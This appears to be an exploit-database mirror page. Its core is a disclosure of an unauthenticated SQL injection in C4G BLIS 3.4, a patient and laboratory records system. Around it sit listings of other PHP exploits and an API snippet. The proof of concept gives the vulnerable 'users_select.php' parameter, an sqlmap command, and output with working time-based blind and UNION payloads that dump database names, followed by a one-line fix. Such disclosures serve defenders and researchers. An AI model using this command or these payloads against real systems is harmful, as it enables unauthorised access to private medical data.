Menu

Improved exploit search engine. Try it out

"C4G Basic Laboratory Information System (BLIS) 3.4 - SQL Injection"

Author

"Carlos Avila"

Platform

php

Release date

2019-02-21

Release Date Title Type Platform Author
2019-05-24 "Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC" webapps php "Todor Donev"
2019-05-23 "Nagios XI 5.6.1 - SQL injection" webapps php JameelNabbo
2019-05-22 "Horde Webmail 5.2.22 - Multiple Vulnerabilities" webapps php InfinitumIT
2019-05-21 "WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities" webapps php "Simone Quatrini"
2019-05-21 "Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting" webapps php "Dionach Ltd"
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-20 "eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution" webapps php liquidsky
2019-05-20 "GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-17 "Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution" webapps php "numan türle"
2019-05-16 "DeepSound 1.0.4 - SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-15 "Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php LiquidWorm
2019-05-15 "CommSy 8.6.5 - SQL injection" webapps php "Jens Regel_ Schneider_ Wulf"
2019-05-14 "PasteShr 1.6 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-14 "Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection" webapps php "Julien Ahrens"
2019-05-14 "Sales ERP 8.1 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-14 "PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)" remote php AkkuS
2019-05-13 "OpenProject 5.0.0 - 8.3.1 - SQL Injection" webapps php "SEC Consult"
2019-05-13 "XOOPS 2.5.9 - SQL Injection" webapps php "felipe andrian"
2019-05-13 "SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - SQL Injection" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Information Disclosure" webapps php LiquidWorm
2019-05-09 "Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting" webapps php "Ibrahim Raafat"
2019-05-06 "PHPads 2.0 - 'click.php3?bannerID' SQL Injection" webapps php "felipe andrian"
2019-05-03 "Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution" webapps php hash3liZer
2019-05-03 "Instagram Auto Follow - Authentication Bypass" webapps php Veyselxan
2019-04-30 "Agent Tesla Botnet - Information Disclosure" webapps php n4pst3r
2019-04-30 "Hyvikk Fleet Manager - Shell Upload" webapps php saxgy1331
2019-04-30 "Joomla! Component JiFile 2.3.1 - Arbitrary File Download" webapps php "Mr Winst0n"
2019-04-30 "HumHub 1.3.12 - Cross-Site Scripting" webapps php "Kağan EĞLENCE"
2019-04-30 "Joomla! Component ARI Quiz 3.7.4 - SQL Injection" webapps php "Mr Winst0n"
Release Date Title Type Platform Author
2019-02-21 "C4G Basic Laboratory Information System (BLIS) 3.4 - SQL Injection" webapps php "Carlos Avila"
2019-01-28 "Care2x 2.7 (HIS) Hospital Information System - Multiple SQL Injection" webapps php "Carlos Avila"
2018-11-06 "LibreHealth 2.0.0 - Arbitrary File Actions" webapps php "Carlos Avila"
2018-09-07 "Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal" webapps php "Carlos Avila"
2018-09-07 "MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection" webapps php "Carlos Avila"
2018-07-11 "Dicoogle PACS 2.5.0 - Directory Traversal" webapps multiple "Carlos Avila"
2018-01-28 "PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection" webapps php "Carlos Avila"
2018-01-28 "PACSOne Server 6.6.2 DICOM Web Viewer - Directory Trasversal" webapps php "Carlos Avila"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46438/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46438/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46438/40902/c4g-basic-laboratory-information-system-blis-34-sql-injection/download/", "exploit_id": "46438", "exploit_description": "\"C4G Basic Laboratory Information System (BLIS) 3.4 - SQL Injection\"", "exploit_date": "2019-02-21", "exploit_author": "\"Carlos Avila\"", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
# Exploit Title: C4G Basic Laboratory Information System (BLIS) 3.4 - Multiples SQL Injection
# Date: 01/31/2019
# Software Links/Project: https://github.com/C4G/BLIS | http://blis.cc.gatech.edu/index.php
# Version: C4G Basic Laboratory Information System v3.4
# Exploit Author: Carlos Avila
# Category: webapps
# Tested on: Windows 8.1 / Ubuntu Linux
# Contact: http://twitter.com/badboy_nt

1. Description
  
C4G Basic Laboratory Information System (BLIS) is an open-source system to track patients, specimens and laboratory results. C4G BLIS is a joint initiative of Computing for Good (C4G) at the Georgia Institute of Technology, the Centers for Disease Control and Prevention (CDC) and Ministries of Health of several countries in Africa. 

This allows unauthenticated remote attacker to execute arbitrary SQL commands and obtain private information. Admin or users valid credentials aren't required. In a deeper analysis other pages are also affected with the vulnerability over others inputs.

It written in PHP it is vulnerable to SQL Injection on multiples occurrences. The parameters affected are detailed below:

http://192.168.6.101:4001/ajax/users_select.php [parameters affected via GET method: site]



2. Proof of Concept



sunday:sqlmap badboy_nt$ python sqlmap.py --url "http://192.168.6.101:4001/ajax/users_select.php?site=1275969" --random-agent --tamper randomcase --level 3 --dbms mysql --threads 3 --dbs
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.1.83#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:51:33 /2019-02-01/

[15:51:33] [INFO] loading tamper module 'randomcase'
[15:51:33] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16' from file '/Users/badboy_nt/Tools/sqlmap/txt/user-agents.txt'
[15:51:34] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: site (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: site=1275969 AND (SELECT * FROM (SELECT(SLEEP(5)))owvW)-- Lzob

    Type: UNION query
    Title: Generic UNION query (random number) - 12 columns
    Payload: site=1275969 UNION ALL SELECT CONCAT(0x71626a7071,0x5754617757446f465a4f41676352594968504a457651676852694d506c69796b6b567643736e6967,0x7171716a71),4936,4936,4936,4936,4936,4936,4936,4936,4936,4936,4936-- tnMf
---
[15:51:35] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[15:51:35] [INFO] testing MySQL
[15:51:36] [INFO] confirming MySQL
[15:51:37] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.4.32
back-end DBMS: MySQL >= 5.0.0
[15:51:37] [INFO] fetching database names
[15:51:38] [INFO] used SQL query returns 4 entries
[15:51:38] [INFO] starting 3 threads
[15:51:39] [INFO] retrieved: 'information_schema'
[15:51:40] [INFO] retrieved: 'blis_127'
[15:51:41] [INFO] retrieved: 'blis_revamp'
[15:51:43] [INFO] retrieved: 'mysql'
available databases [4]:                                                                                                                                              
[*] blis_127
[*] blis_revamp
[*] information_schema
[*] mysql


3. Solution:

Application inputs must be validated correctly throughout the development of the project.